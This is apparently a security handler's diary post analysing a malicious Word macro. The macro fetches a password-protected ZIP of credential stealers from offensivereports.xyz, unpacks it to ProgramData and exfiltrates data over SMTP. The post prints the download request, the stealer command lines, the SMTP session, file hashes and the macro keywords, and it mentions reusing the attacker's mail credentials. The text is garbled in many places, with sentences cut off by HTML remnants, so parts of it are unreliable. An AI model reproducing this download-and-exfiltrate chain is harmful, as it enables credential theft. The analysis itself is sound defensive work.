Every day, we are spammed with thousands of malicious emails and attackers always try to find new ways to bypass the security controls. Yesterday, I detected a suspicious HTTP GET request:
GET /ork/install.zip?fid=484703180 HTTP/1.1User-Agent: http://offensivereports.xyz/ork/install.zip?fid=48473180Host: offensivereports.xyz
Just by reading the User-Agent string, you already know that this is something weird and it must be investigated. I downloaded the file whichwas indeed a ZIP archive and not a disguised PE file. But this time, the archive is protected with a password! The file MD5 is 55d620a29afc46de0a5cb2bebfd7968b and is reported as non-malicious by VT (normal: the files can"> $ unzip -l install.zipArchive: install.zip Length Date Time Name -------- ---- ---- ---- 439608 09-14-15 12:44 msvcp140.dll 348160 04-28-16 09:15 msvcr71.dll 676036 04-28-16 09:15 sqlite3.7.11.dll 196608 04-28-16 09:15 ssleay32.dll 488467 09-25-16 10:17 upd.exe 88248 06-23-15 15:00 vcruntime140.dll 57 09-22-16 22:19 x.Cmd 466432 09-16-16 08:10 em.exe 418304 09-16-16 08:31 fb.exe 439808 09-26-16 12:27 ie.exe 1011712 04-28-16 09:15 libeay32.dll 2533907 09-26-16 13:55 msupd.exe -------- ------- 7107347 12 files
More checks in my log files revealed that the HTTP GET originated from a malicious Word document (MD5: 9f2264c60115cc6d1dd69a4348a26fb2 - unknown on VirusTotal). Let" />
The document contains hidden data (a white font on a white background) which looks like Base64/XOR" />
The macro was pretty well obfuscated to evade the classic antivirus solution but a quick manual analysis of the macro revealed that the hidden data are extracted and the decrypted data aredumped in a file"> +------------+---------------+-----------------------------------------+| Type | Keyword | Description |+------------+---------------+-----------------------------------------+| AutoExec | AutoOpen | Runs when the Word document is opened || AutoExec | Workbook_Open | Runs when the Excel Workbook is opened || Suspicious | Open | May open a file || Suspicious | Shell | May run an executable file or a system || | | command || Suspicious | MkDir | May create a directory || Suspicious | Binary | May read or write a binary file (if || | | combined with Open) || Suspicious | CreateObject | May create an OLE object || Suspicious | Chr | May attempt to obfuscate specific || | | strings || Suspicious | Xor | May attempt to obfuscate specific || | | strings || Suspicious | Environ | May read system environment variables || Suspicious | Put | May write to a file (if combined with || | | Open) |+------------+---------------+-----------------------------------------+
The created file xx.cmd is a PE file (MD5:9b8af9042b8f357e17e6609aa5d0dc7d) also unknown on VT. The file is executed by the macro using a Shell() command. It performs the following actions:
- It downloads the ZIP file mentioned above
- It extracts the content on the file system in %PROGRAMDATA%
- It executes msupd.exe (extracted from the archive - see the content above)
The next step was to get the files from the ZIP archive. The .cmd PE file was not obfuscated and contained a lot of strings. I created a dictionary based on those strings and started a dictionary attack against the archive, no success. Let"> $ md5sum *MD5 (em.exe) = bae5851b1ea539b16800f5bdaded3a68MD5 (fb.exe) = 38ff837f504f63e04491682e96447cdbMD5 (ie.exe) = a8107e664bfbee36653bcdcff37afa00MD5 (libeay32.dll) = 177bda0c92482dfa2c162a3750932b9cMD5 (msupd.exe) = 8e402be9c03d288a5aee9565143632bcMD5 (msvcp140.dll) = 1d8c79f293ca86e8857149fb4efe4452MD5 (msvcr71.dll) = 86f1895ae8c5e8b17d99ece768a70732MD5 (sqlite3.7.11.dll) = f45ed79fee632e407831fbebc51fc063MD5 (ssleay32.dll) = 5023f4c4aaaa1b6e9d992d6bbdcd340bMD5 (upd.exe) = 6c66d7c6a3718d515370709a9f06f4a6MD5 (vcruntime140.dll) = c2bbcb5aae069c22711d8e49d6107401MD5 (x.Cmd) = f97253ff3c80b94fa2efb9e5ab1808db
Only the file em.exe is reported as malicious byVT[1]. The msupd.exe file as an original name setup.exe"> C:\ProgramData\ie.exe -f C:\ProgramData\bigchunk\ie.txtC:\ProgramData\em.exe, -f C:\ProgramData\bigchunk\em.txtC:\ProgramData\fb.exe -f C:\ProgramData\bigchunk\fb.txt
Those files">
220 s37.linuxpl.com ESMTP ServerEHLO SystemIT250-s37.linuxpl.com Hello xxxxxxxx [x.x.x.x]250-SIZE 104857600250-8BITMIME250-PIPELINING250-AUTH PLAIN LOGIN250-STARTTLS250 HELPAUTH PLAIN xxxxxxxxxxx235 Authentication succeededAUTH LOGIN503 already authenticatedMAIL FROM:
Now I have the attackers email address and credentials to use his mail server!
Sadly, the attack was not completely successful in my sandbox environment and no data was ex-filtrated (collected credentials). I did not detectany traffic to the Wild Internet... As you can see, attackers are always trying to find ways to bypass security controls like password protected archives, generic Microsoft tools).
Stay safe!
[1]https://www.virustotal.com/en/file/2e149eae2956d2d749110f803044ff8b252dcbaf3ae09bdcf30a58b74bbd7329/analysis/
[2]https://www.microsoft.com/en-us/download/details.aspx?id=24556
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key